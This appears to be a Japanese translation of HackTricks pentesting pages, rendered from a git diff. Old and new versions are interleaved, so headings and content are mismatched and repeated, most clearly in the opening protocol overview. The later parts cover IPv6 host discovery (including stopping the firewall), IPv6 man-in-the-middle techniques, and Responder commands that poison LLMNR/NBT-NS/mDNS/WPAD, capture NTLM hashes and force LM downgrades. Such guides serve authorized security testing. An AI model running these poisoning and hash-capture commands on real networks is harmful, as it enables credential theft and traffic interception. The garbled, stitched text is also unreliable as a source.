OAuth 2.0は、ユーザー情報の安全な選択的共有を容易にするプロトコルです。たとえば、Googleからユーザーデータにアクセスすることを可能にし、複数のログインなしでサービスがユーザーデータにアクセスできるようにします。このプロセスには、ユーザー認証、ユーザーによる承認、Googleによるトークン生成が含まれ、指定されたユーザーデータへのサービスアクセスが許可されます。
# SSDP
## RADIUS
RADIUSRemote Authentication Dial-In User Serviceは、主にISPによって使用されるネットワークアクセスプロトコルです。認証、承認、およびアカウンティングをサポートします。ユーザーの資格情報はRADIUSサーバーによって検証され、セキュリティを強化するためにネットワークアドレスの検証が含まれる場合があります。認証後、ユーザーはネットワークアクセスを受け取り、セッションの詳細が請求および統計目的で追跡されます。
Simple Service Discovery Protocolは、主にUPnPプロトコルを使用してネットワーク内のサービスを発見するために使用されます。
## SMBとNetBIOS
SSDPは、UDPを基にしたテキストベースのプロトコルで、特定のIPマルチキャストアドレスにUDPポート番号1900でマルチキャストアドレスを使用してホストシステムによってサービスが広告されます。IPv4では、マルチキャストアドレスは239.255.255.250です。
### SMBServer Message Block
SMBは、ファイル、プリンター、ポートを共有するためのプロトコルです。TCPポート445を介して直接動作するか、NetBIOS over TCPポート137、138を介して動作します。この二重互換性により、さまざまなデバイスとの接続が向上します。
# WSD
### NetBIOSNetwork Basic Input/Output System
NetBIOSは、リソース共有のためのネットワークセッションと接続を管理します。デバイス用の一意の名前と複数のデバイス用のグループ名をサポートし、ターゲット指定またはブロードキャストメッセージングを可能にします。通信は接続レス確認なしまたは接続指向セッションベースで行われます。NetBIOSは従来、IPC/IPXなどのプロトコルを介して動作していましたが、一般的にTCP/IPを介して使用されています。関連するプロトコルであるNetBEUIは、速度が速いことで知られていましたが、ブロードキャストによる冗長な通信も多かったです。
**デバイス向けWebサービス**。
このサービスは、ネットワークに接続されたデバイスがネットワーク内で利用可能なサービス(プリンターなど)を発見できるようにします。
クライアントは、特定の種類のサービスを要求するためにブロードキャストUDPパケットを送信するか、サービスプロバイダーが提供していることを示すブロードキャストパケットを送信できます。
# OAuth2.0
Googleなどの情報を他のサービスと共有できるプロトコル。
基本的には、1つのサービスに保存されている適切で必要な情報を別のサービスと共有できるようにします。これにより、ログインが迅速に行われ、データが1か所にのみ保存され、ユーザー名やパスワードをあちこちに入力する必要がなくなります。
動作方法:
まず、Googleにログインしている必要があります。または、ログインするためのウィンドウが開きます。その後、サービスはGoogleサーバーに情報にアクセスするためのトークンを要求します。 Googleは、「アプリケーションXXXXXがあなたのこの情報にアクセスすることを要求しています...」という画面を表示します。承認をクリックすると、Googleはアプリケーションにコードで応答し、アプリケーションはそのコードを使用してGoogleからトークンを要求します。アプリケーションがトークンを取得すると、Google APIを使用して要求した情報を取得できます。
# RADIUS
ネットワークへのアクセスの認証および承認プロトコル。 \(UDPポート1813を使用\)
主に、インターネットサービスプロバイダが顧客のネットワークアクセスを管理するために使用されます。
認証、承認、注釈を許可します。
動作方法:
ユーザーは最初にNASサーバーへのゲートウェイと話し合い、送信された名前とパスワードが有効かどうかをRADIUSサーバーに問い合わせます。
より高いセキュリティを確保するために、サーバーのネットワークアドレスや電話番号を確認して、一致するかどうかを確認できます。
RADIUSサーバーと接続しようとするユーザーは、「共有シークレット」と呼ばれるものを持っています。このように、RADIUSサーバーはNASにチャレンジを送信し、ユーザーがログインしようとしている間にそれを暗号化し、それをNASに転送します。そして、RADIUSが行った暗号化と一致する場合、ユーザーは自分のアイデンティティを証明しました。
アイデンティティが証明されると、RADIUSユーザーはNASにユーザーにIPアドレスを割り当てるよう指示します。また、これが完了すると、NASは記録するためにRADIUSに開始メッセージを送信します。ユーザーがログアウトすると、NASは終了メッセージを送信します。このようにして、RADIUSはセッションの消費を記録して請求できるようになりますこのデータは統計目的にも使用されます
# SMBとNetBIOS
## **SMB**
ファイル/プリンター/ポート共有プロトコル...
これは、TCPポート445上で直接実行するか、UDP 137、138またはTCP 137、138上でNetBIOS over TCPを使用することができますnetbios-ssnと呼ばれます
SMBがTCPのみまたはNetBIOS + TCP上で実装される目的は、他のどちらかをサポートする機器との通信能力を向上させることです。
## **NetBIOS**
その機能は、セッションを確立し、接続を維持してネットワークリソースを共有することですが、1つの場所から別の場所にパケットを送信するにはIPC/IPXまたはNetBEUIまたはTCP/IPが必要です。
NetBIOSを使用するすべてのマシンは、他と区別する一意の**名前**を持っている必要があります。したがって、新しいマシンが入ってきた場合、使用しようとしている名前を誰も使用していないかどうかが最初にチェックされます。また、複数のステーションが使用できる**グループ名**がありますが、同じ名前のグループが2つあってはいけません。これは、複数のマシンにメッセージを送信できる方法です。したがって、ユーザー、グループ、またはブロードキャストにメッセージを送信できます。
接続は接続指向または非接続指向になります:
**非接続指向:** 宛先にデータグラムが送信されますが、挨拶や受信メッセージはありません。宛先マシンはデータグラムを受信できるように構成されている必要があります。
**接続指向:** 2つの名前間でセッションが作成されます同じマシンの2つの名前間でも可能です。受信またはエラーメッセージが送信されます。
**NetBEUI**は実際にはNetBEUI上のNetBIOSであり、NetBIOSにつながるネットワークおよびトランスポートプロトコルです。高速でしたが、非常にイズが多かったため、多くのブロードキャストが行われました。NetBEUI上でSMBを実行することもできますが、NetBIOSがTCP上で実行されるよりも一般的です。
# LDAP
TCP/IPを介してディレクトリを管理し、ユーザー情報ベースにアクセスすることを可能にするプロトコル。
異なるコマンドを介して情報を抽出および導入することができます。
したがって、このプロトコルは、このプロトコルを話すように準備されたさまざまなデータベースにアクセスするために使用されるプロトコルです。
# Active Directory
基本的には、ユーザー、グループ、特権、リソースなどの情報を持つオブジェクトのデータベースであり、ネットワークからアクセス可能(ドメインを介して)であり、その情報にアクセスして管理できるようにするためのものです。
オブジェクトを保存するサーバー。これらのオブジェクトは、ドメインを介してネットワーク上で見えます。ドメイン内には、実装されているサーバー、グループ、ユーザーなどが含まれます...
サブドメインも持つことができ、それぞれにグループ、ユーザーなどに関連付けられたサーバーがあります...
このように、ネットワークのユーザーの管理が中央集権化されており、ログインできるユーザーはこのサーバーで生成でき、アクセス権を持っているかどうかを知るために、特定のネットワークリソースにアクセスできるかどうかを知ることができ、すべてが簡単な方法で制御できます。
このように、ユーザー名を指定してディレクトリを照会し、メールアドレスや電話番号などの情報を取得することができます。また、プリンターはどこにありますか?ドメイン名は何ですか?などの一般的な照会も行うことができます。
## LDAPLightweight Directory Access Protocol
LDAPは、TCP/IP上でディレクトリ情報の管理とアクセスを可能にするプロトコルです。さまざまな操作をサポートし、ディレクトリ情報のクエリと変更を行うために使用されます。主に、分散ディレクトリ情報サービスへのアクセスとメンテナンスに使用され、LDAP通信向けに設計されたデータベースとのやり取りを可能にします。
## Active DirectoryAD
Active Directoryは、ユーザー、グループ、特権、リソースなどのオブジェクトを含むネットワークアクセス可能なデータベースであり、ネットワークエンティティの中央管理を容易にします。ADは、ドメインの階層構造にデータを整理し、サーバー、グループ、ユーザーなどを含むことができます。サブドメインを使用すると、さらにセグメンテーションが可能で、それぞれが独自のサーバーとユーザーベースを維持できます。この構造はユーザー管理を中央集権化し、ネットワークリソースへのアクセスを許可または制限します。特定の情報連絡先詳細などを取得したり、ドメイン内のリソースプリンターなどを検索したりするためにクエリを実行できます。
<details>
@ -126,8 +63,10 @@ TCP/IPを介してディレクトリを管理し、ユーザー情報ベース
HackTricksをサポートする他の方法
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい場合**は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスウォッグ**](https://peass.creator-spring.com)を入手する
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見る
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)をフォローする
* **HackTricks**https://github.com/carlospolop/hacktricksと[**HackTricks Cloud**](https://github.com/carlospol
* **HackTricks**https://github.com/carlospolop/hacktricksと[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する
</details>

138
generic-methodologies-and-resources/pentesting-network/pentesting-ipv6.md
View file

@ -1,14 +1,14 @@
<details>
<summary><strong>ゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary><strong>ゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
HackTricks をサポートする他の方法:
* **HackTricks で企業を宣伝したり、HackTricks をPDFでダウンロードしたい場合は** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェックしてください!
* [**公式PEASSHackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f) に参加するか、[**telegramグループ**](https://t.me/peass) に参加するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live) をフォローする
* **ハッキングテクニックを共有するために、PRを** [**HackTricks**](https://github.com/carlospolop/hacktricks) **と** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **のGitHubリポジトリに提出してください。**
* **HackTricks で企業を宣伝したい** または **HackTricks をPDFでダウンロードしたい** 場合は [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェックしてください!
* [**公式PEASSHackTricksグッズ**](https://peass.creator-spring.com)を入手してください
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)、当社の独占的な [**NFTs**](https://opensea.io/collection/the-peass-family) コレクションを発見してください
* **💬 [Discord グループ](https://discord.gg/hRep4RUj7f)** に参加するか、[telegram グループ](https://t.me/peass) に参加するか、**Twitter** 🐦 **@hacktricks_live** をフォローしてください
* **HackTricks** および **HackTricks Cloud** の github リポジトリに PR を提出して **ハッキングトリックを共有**してください
</details>
@ -17,86 +17,94 @@ HackTricks をサポートする他の方法:
## ネットワーク
IPv6アドレスでは、**最初の48ビットがネットワークプレフィックス**です。**次の16ビットはサブネットID**であり、サブネットを定義するために使用されます。最後の**64ビットはインターフェース識別子**ですインターフェースIDまたはデバイスIDとしても知られており、デバイス用です。必要に応じて、通常デバイスIDに予約されているビットを追加のサブネットマスキングに使用できます。
IPv6アドレスはネットワークの構成とデバイス間の相互作用を向上させるために構造化されています。IPv6アドレスは以下に分割されます:
IPv6にはARPはありません。代わりに、**ICMPv6 NSNeighbor SolicitationおよびNANeighbor Advertisement**があります。**NS**はアドレスを解決するために使用され、**マルチキャスト**パケットを送信します。**NA**は**ユニキャスト**であり、NSに回答するために使用されます。NAパケットはNSパケットを必要とせずに送信することもできます。
1. **ネットワークプレフィックス**: ネットワークセグメントを決定する最初の48ビット。
2. **サブネットID**: ネットワーク内の特定のサブネットを定義するために使用される続く16ビット。
3. **インターフェース識別子**: サブネット内のデバイスを一意に識別するための最後の64ビット。
**0:0:0:0:0:0:0:1** = 1IPv4の127.0.0.1に相当する `::1`
IPv6はIPv4に見られるARPプロトコルを省略していますが、**ICMPv6** を導入しています。ICMPv6には2つの主要なメッセージがあります:
- **Neighbor Solicitation (NS)**: アドレス解決のためのマルチキャストメッセージ。
- **Neighbor Advertisement (NA)**: NSへのユニキャスト応答または自発的なアナウンス。
**リンクローカルアドレス:** これらはインターネットでルーティングされることを意図していないプライベートアドレスです。これらは、プライベートまたは一時的なLANでのファイルの共有や配布のためにローカルで使用できます。この種のアドレスを使用しているローカルLAN内の他のデバイスは、マルチキャストアドレス ff02::01 にpingを送信することで見つけることができます。\
**FE80::/10** リンクローカルユニキャストアドレス範囲。
IPv6には特別なアドレスタイプも組み込まれています:
- **ループバックアドレス (`::1`)**: IPv4の `127.0.0.1` に相当し、ホスト内での内部通信用です。
- **リンクローカルアドレス (`FE80::/10`)**: インターネットルーティングではなく、ローカルネットワーク活動用です。同じローカルネットワーク上のデバイスは、この範囲を使用して互いを発見できます。
### ネットワークコマンドでのIPv6の実用的な使用
IPv6ネットワークとやり取りするために、さまざまなコマンドを使用できます:
- **リンクローカルアドレスの ping**: `ping6` を使用してローカルデバイスの存在を確認します。
- **Neighbor Discovery**: `ip neigh` を使用してリンク層で発見されたデバイスを表示します。
- **alive6**: 同じネットワーク上のデバイスを発見するための代替ツールです。
以下はいくつかのコマンドの例です:
```bash
ping6 I eth0 -c 5 ff02::1 > /dev/null 2>&1
ip neigh | grep ^fe80
#Or you could also use
# Alternatively, use alive6 for neighbor discovery
alive6 eth0
```
If you **know the MAC address of a host in the same net** as you (you could just ping its ipv4 address and view the arp table to found its MAC address), you can calculate his Link-local address to communicate with him.\
Suppose the **MAC address** is **`12:34:56:78:9a:bc`**
## **MACアドレスからリンクローカルIPv6アドレスを導出する**
1. To IPv6 notation: **`1234:5678:9abc`**
2. Append `fe80::` at the beginning and Insert `fffe` in the middle: **`fe80::`**`1234:56`**`ff:fe`**`78:9abc`
3. Invert seventh bit from the left, from 0001 0010 to 0001 0000: `fe80::1`**`0`**`34:56ff:fe78:9abc`
4. `fe80::1034:56ff:fe78:9abc`
与えられたMACアドレス **`12:34:56:78:9a:bc`** から、次のようにリンクローカルIPv6アドレスを構築できます
**Unique local address:** This type of ipv6 address also not intended to be routed on the public internet. Unique local is a replacement of site-local address, that allows communication within a site while being routable to a multiple local networks.\
**FEC00::/7** The unique local address range.
1. MACをIPv6形式に変換**`1234:5678:9abc`**
2. `fe80::`を前置し、中央に`fffe`を挿入:**`fe80::1234:56ff:fe78:9abc`**
3. 左から7番目のビットを反転させ、`1234`を`1034`に変更:**`fe80::1034:56ff:fe78:9abc`**
**Multicast Address:** This can also be refered to as One-to-Many. Packets addressed to multicast address are delivered to all interface identified by the multicast address. Multicast address types are easily notable because they normally begins with FF.\
**FF00::/8** The multicast range.
## **IPv6アドレスの種類**
**Anycast:** This form of ipv6 address is similar to the multicast address with a slight difference. Anycast address can also be refered to as One to Nearest. It can be used to address packets meant for multiple interfaces; but usually it sends packets to the first interface it finds as defined in the routing distance. This means it send packets to the closest interface as determined by routing protocols.\
**20000::/3** The global unicast address range.
- **Unique Local Address (ULA)**:公共インターネット経由ではなく、ローカル通信用。プレフィックス:**`FEC00::/7`**
- **マルチキャストアドレス**:一対多の通信用。マルチキャストグループ内のすべてのインターフェースに配信される。プレフィックス:**`FF00::/8`**
- **エニーキャストアドレス**:一番近いインターフェースに送信される、一対最寄りの通信用。**`2000::/3`** グローバルユニキャスト範囲の一部。
fe80::/10--> Unique Link-Local (169.254.x.x) \[fe80:0000:0000:0000:0000:0000:0000:0000,febf:ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff]\
fc00::/7 --> Unique Local-Unicast (10.x.x.x, 172.16.x.x, 192.168.x.x) \[]\
2000::/3 --> Global Unicast\
ff02::1 --> Multicast All Nodes\
ff02::2 --> Multicast Router Nodes
## **アドレスプレフィックス**
- **fe80::/10**リンクローカルアドレス169.254.x.xに類似
- **fc00::/7**ユニークローカルユニキャスト10.x.x.x、172.16.x.x、192.168.x.xなどのプライベートIPv4範囲に類似
- **2000::/3**:グローバルユニキャスト
- **ff02::1**:マルチキャスト全ノード
- **ff02::2**:マルチキャストルーターノード
## **Guess the IPv6 of a machine**
## **ネットワーク内のIPv6アドレスの発見**
**Way 1**
### 方法1リンクローカルアドレスの使用
1. ネットワーク内のデバイスのMACアドレスを取得する。
2. MACアドレスからリンクローカルIPv6アドレスを導出する。
The IPv6 of fe80::/10 are based on the MAC. If you have the IPv6 of a device inside a network and you want to guess the IPv6 of another device of the network, you can get its MAC address using a ping (inside the arp table).
**Way2**
You can send a ping6 to the multicast and get the IPv6 address inside the arp table.
### 方法2マルチキャストの使用
1. ローカルネットワーク上のIPv6アドレスを発見するために、マルチキャストアドレス`ff02::1`にpingを送信する。
```bash
service ufw stop #Stop firewall
ping6 -I <IFACE> ff02::1 #You could also make: ping6 -I <IPV6> ff02::1 if you want to make a ping to a specific IP Address
ip -6 neigh
alive6
use auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement; set INTERFACE eth1; run
service ufw stop # Stop the firewall
ping6 -I <IFACE> ff02::1 # Send a ping to multicast address
ip -6 neigh # Display the neighbor table
```
# IPv6 MitM
## IPv6 Man-in-the-Middle (MitM) Attacks
IPv6ネットワークでのMitM攻撃を実行するためのいくつかの技術が存在します:
ICMPv6隣接広告を偽装して中間者攻撃を行う。
* ICMPv6ルータ広告を偽装して中間者攻撃を行う。
* ICMPv6リダイレクトまたはICMPv6 too bigを使用して中間者攻撃を行う。
* モバイルIPv6を攻撃する中間者攻撃だが、IPsecを無効にする必要がある。
* 偽のDHCPv6サーバを使用して中間者攻撃を行う。
- ICMPv6ネイバーやルーター広告のスプーフィング。
- ルーティングを操作するためにICMPv6リダイレクトや「パケットが大きすぎる」メッセージを使用する。
- モバイルIPv6を攻撃する通常、IPSecが無効になっている必要があります
- ローグDHCPv6サーバーを設定する。
# IPv6アドレスの特定
# 野生のIPv6アドレスの発見
## サブドメイン
Googleや他のブラウザを使用して、"ipv6.\*"のようなサブドメインを検索できます。
## サブドメインの探索
IPv6アドレスに関連付けられている可能性のあるサブドメインを見つける方法は、検索エンジンを活用することです。たとえば、`ipv6.*`のようなクエリパターンを使用することが効果的です。具体的には、Googleで次の検索コマンドを使用できます:
```bash
site:ipv6./
```
## DNS
## DNSクエリの利用
IPv6アドレスを特定するために、特定のDNSレコードタイプをクエリできます
- **AXFR**: 完全なゾーン転送をリクエストし、幅広いDNSレコードを明らかにする可能性があります。
- **AAAA**: 直接IPv6アドレスを検索します。
- **ANY**: 利用可能なすべてのDNSレコードを返す広範なクエリです。
組織のIPv6デバイスを見つけたら、DNSで "**AXFR**" (ゾーン転送)、"**AAAA**" (IPv6)、または "**ANY**" (すべて) レジストリを検索してIPv6アドレスを見つけることもできます。
## Ping6を使用したプロービング
組織に関連付けられたIPv6アドレスを特定した後、`ping6`ユーティリティを使用してプロービングできます。このツールは、特定されたIPv6アドレスの応答性を評価するのに役立ち、隣接するIPv6デバイスを発見するのにも役立つかもしれません。
## Ping6
組織のいくつかのIPv6デバイスを見つけたら、`ping6`を使用して近くのアドレスをチェックすることができます。
# 参考文献
@ -106,14 +114,14 @@ site:ipv6./
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong>**ゼロからヒーローまでのAWSハッキングを学ぶ**</summary>
<summary><strong>ゼロからヒーローまでのAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法:
HackTricksをサポートする他の方法
* **HackTricksで企業を宣伝したい**、または **HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手す
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な [**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つける
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f) に参加するか、[**telegramグループ**](https://t.me/peass) に参加するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live) をフォローする
* **HackTricks** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks) のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有する
* **HackTricksで企業を宣伝したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスウェグ**](https://peass.creator-spring.com)を手に入れ
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つける
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)で**フォロー**する。
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks)のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
</details>

326
generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md
View file

@ -1,4 +1,4 @@
# LLMNR、NBT-NS、mDNS/DNSおよびWPADのスプーフィングとリレーアタック
# LLMNR、NBT-NS、mDNS/DNS、WPADおよびリレーアタックのスプーフィング
<details>
@ -6,8 +6,8 @@
HackTricksをサポートする他の方法
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksスウグ**](https://peass.creator-spring.com)を入手する
- **HackTricksで企業を宣伝したい****HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksスウォッグ**](https://peass.creator-spring.com)を入手する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter**で**@hacktricks_live**をフォローする
- **HackTricks**および**HackTricks Cloud**のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有する
@ -16,281 +16,117 @@ HackTricksをサポートする他の方法
## ネットワークプロトコル
### LLMNR、NBT-NS、およびmDNS
### ローカルホスト解決プロトコル
- **LLMNR、NBT-NS、およびmDNS**
- Microsoftおよび他のオペレーティングシステムは、DNSが失敗した場合にローカル名の解決にLLMNRおよびNBT-NSを使用します。同様に、AppleおよびLinuxシステムはmDNSを使用します。
- これらのプロトコルは、UDPを介した認証されていないブロードキャスト性質により、傍受およびスプーフィングの影響を受けやすくなっています。
- [Responder](https://github.com/lgandx/Responder)を使用して、これらのプロトコルをクエリするホストに偽の応答を送信することで、サービスをなりすますことができます。
- Responderを使用したサービスのなりすましに関する詳細情報は[こちら](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)にあります。
Microsoftシステムは、DNS検索が失敗した場合にローカルホストの解決にLink-Local Multicast Name ResolutionLLMNRおよびNetBIOS Name ServiceNBT-NSを使用します。Apple BonjourおよびLinuxゼロ構成実装は、ネットワーク内のシステムを発見するためにマルチキャストDNSmDNSを使用します。これらのプロトコルは認証されず、UDP経由でブロードキャストメッセージを送信するため、攻撃者はこれらを悪用してユーザーを悪意のあるサービスに誘導することができます。
### Web Proxy Auto-Discovery Protocol (WPAD)
- WPADはブラウザがプロキシ設定を自動的に検出することを可能にします。
- 検出は、DHCP、DNS、またはDNSが失敗した場合はLLMNRおよびNBT-NSによって行われます。
- Responderを使用して、クライアントを悪意のあるWPADサーバに誘導するWPAD攻撃を自動化できます。
Responderを使用して、ホストが検索するサービスを偽の応答を送信することで偽装することができます。\
[Responderを使用したサービスの偽装に関する詳細情報はこちら](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)を参照してください。
### プロトコルポイズニングのためのResponder
- **Responder**は、LLMNR、NBT-NS、およびmDNSクエリを毒化するためのツールであり、クエリタイプに基づいて選択的に応答し、主にSMBサービスを対象としています。
- Kali Linuxには事前にインストールされており、`/etc/responder/Responder.conf`で設定可能です。
- Responderはキャプチャされたハッシュを画面に表示し、`/usr/share/responder/logs`ディレクトリに保存します。
- IPv4およびIPv6の両方をサポートしています。
- ResponderのWindowsバージョンは[こちら](https://github.com/lgandx/Responder-Windows)で入手できます。
### WPAD
#### Responderの実行
- デフォルト設定でResponderを実行するには`responder -I <Interface>`
- より積極的なプロービングを行う場合(潜在的な副作用がある):`responder -I <Interface> -P -r -v`
- NTLMv1のチャレンジ/レスポンスをキャプチャしてクラックを容易にするためのテクニック:`responder -I <Interface> --lm --disable-ess`
- WPADなりすましを有効にするには`responder -I <Interface> --wpad`
- NetBIOSリクエストを攻撃者のIPに解決し、認証プロキシを設定する`responder.py -I <interface> -Pv`
多くのブラウザは、Web Proxy Auto-DiscoveryWPADを使用してネットワークからプロキシ設定を読み込みます。WPADサーバーは、次のいずれかを通じて特定のURLたとえば、_http://wpad.example.org/wpad.dat_を介してクライアントプロキシ設定を提供します。
### Responderを使用したDHCPポイズニング
- DHCP応答のスプーフィングは、ARPポイズニングに比べてネットワークのルーティング情報を永続的に毒化することができ、より慎重な代替手段を提供します。
- ターゲットネットワークの構成について正確な知識が必要です。
- 攻撃の実行:`./Responder.py -I eth0 -Pdv`
- この方法は効果的にNTLMv1/2ハッシュをキャプチャできますが、ネットワークの混乱を避けるために注意深く取り扱う必要があります。
- DHCP、コード252エントリを使用[34](https://learning.oreilly.com/library/view/Network+Security+Assessment,+3rd+Edition/9781491911044/ch05.html#ch05fn41)
- ローカルドメインで_wpad_ホスト名を検索するDNS
- Microsoft LLMNRおよびNBT-NSDNS検索が失敗した場合
### Responderを使用した資格情報のキャプチャ
- Responderは上記のプロトコルを使用してサービスをなりすまし、ユーザーがなりすましサービスに認証しようとするときに資格情報通常はNTLMv2チャレンジ/レスポンス)をキャプチャします。
- NetNTLMv1へのダウングレードやESSの無効化を試みることで、資格情報のクラックを容易にすることができます。
ResponderはWPAD攻撃を自動化し、プロキシを実行し、DHCP、DNS、LLMNR、およびNBT-NSを介してクライアントを悪意のあるWPADサーバーに誘導します。
これらの技術を適切に使用するためには、適切な権限を確保し、不正アクセスや混乱を避けるために合法的かつ倫理的に行動することが重要です。
## プロトコルの毒入れ
## Inveigh
### Responder - LLMNR、NBT-NS、およびMDNS
Inveighは、Windowsシステム向けに設計されたペネトレーションテスターおよびレッドチーム向けのツールです。Responderと同様の機能を提供し、スプーフィングや中間者攻撃を実行します。このツールはPowerShellスクリプトからC#バイナリに進化し、[**Inveigh**](https://github.com/Kevin-Robertson/Inveigh)および[**InveighZero**](https://github.com/Kevin-Robertson/InveighZero)が主要なバージョンとして提供されています。詳細なパラメータや手順については、[**wiki**](https://github.com/Kevin-Robertson/Inveigh/wiki/Parameters)を参照してください。
> ResponderはLLMNR、NBT-NS、およびMDNSの毒入れツールです。名前接尾辞に基づいて特定のNBT-NSNetBIOS Name Serviceクエリに応答します参照[http://support.microsoft.com/kb/163409](http://support.microsoft.com/kb/163409)。デフォルトでは、このツールはSMB用のファイルサーバーサービスリクエストにのみ応答します。
>
> この背後にあるコンセプトは、私たちの回答をターゲットにすることであり、ネットワーク上でステルス性を持たせることです。これにより、合法的なNBT-NSの動作を壊さないようにするのにも役立ちます。
- [**Responder**](https://github.com/lgandx/Responder)はkaliにデフォルトでインストールされており、構成ファイルは\*\*`/etc/responder/Responder.conf` \*\*にあります(ここでローグサーバーを無効にできます)
- **Responder**は**画面にハッシュを表示**し、ホストごとに`/usr/share/responder/logs`ディレクトリにあるログファイルに書き込みます。ハッシュは`(MODULE_NAME)-(HASH_TYPE)-(CLIENT_IP).txt`形式で保存されます
- **Windows**用のResponderは[こちら](https://github.com/lgandx/Responder-Windows)で見つけることができます
- Responderは**ipv4**および**ipv6**で動作します
#### Responderパラメータ
Responderは以下のオプションをサポートしています:
```
--version show program's version number and exit
-h, --help show this help message and exit
-A, --analyze Analyze mode. This option allows you to see NBT-NS,
BROWSER, LLMNR requests without responding.
-I eth0, --interface=eth0
Network interface to use, you can use 'ALL' as a
wildcard for all interfaces
-i 10.0.0.21, --ip=10.0.0.21
Local IP to use (only for OSX)
-6 2002:c0a8:f7:1:3ba8:aceb:b1a9:81ed, --externalip6=2002:c0a8:f7:1:3ba8:aceb:b1a9:81ed
Poison all requests with another IPv6 address than
Responder's one.
-e 10.0.0.22, --externalip=10.0.0.22
Poison all requests with another IP address than
Responder's one.
-b, --basic Return a Basic HTTP authentication. Default: NTLM
-r, --wredir Enable answers for netbios wredir suffix queries.
Answering to wredir will likely break stuff on the
network. Default: False
-d, --DHCP Enable answers for DHCP broadcast requests. This
option will inject a WPAD server in the DHCP response.
Default: False
-D, --DHCP-DNS This option will inject a DNS server in the DHCP
response, otherwise a WPAD server will be added.
Default: False
-w, --wpad Start the WPAD rogue proxy server. Default value is
False
-u UPSTREAM_PROXY, --upstream-proxy=UPSTREAM_PROXY
Upstream HTTP proxy used by the rogue WPAD Proxy for
outgoing requests (format: host:port)
-F, --ForceWpadAuth Force NTLM/Basic authentication on wpad.dat file
retrieval. This may cause a login prompt. Default:
False
-P, --ProxyAuth Force NTLM (transparently)/Basic (prompt)
authentication for the proxy. WPAD doesn't need to be
ON. This option is highly effective when combined with
-r. Default: False
--lm Force LM hashing downgrade for Windows XP/2003 and
earlier. Default: False
--disable-ess Force ESS downgrade. Default: False
-v, --verbose Increase verbosity.
```
<details>
<summary>Responder パラメータ</summary>
* `-A` フラグは**解析モード**に入り、環境内の NBT-NS、BROWSER、および LLMNR リクエストを毒化せずに表示できます。
* 必ずインターフェースまたは IP を指定する必要があります。
* `-wf` は WPAD ローグプロキシサーバーを起動します。
* `-f` はリモートホストのオペレーティングシステムとバージョンを特定しようとします。
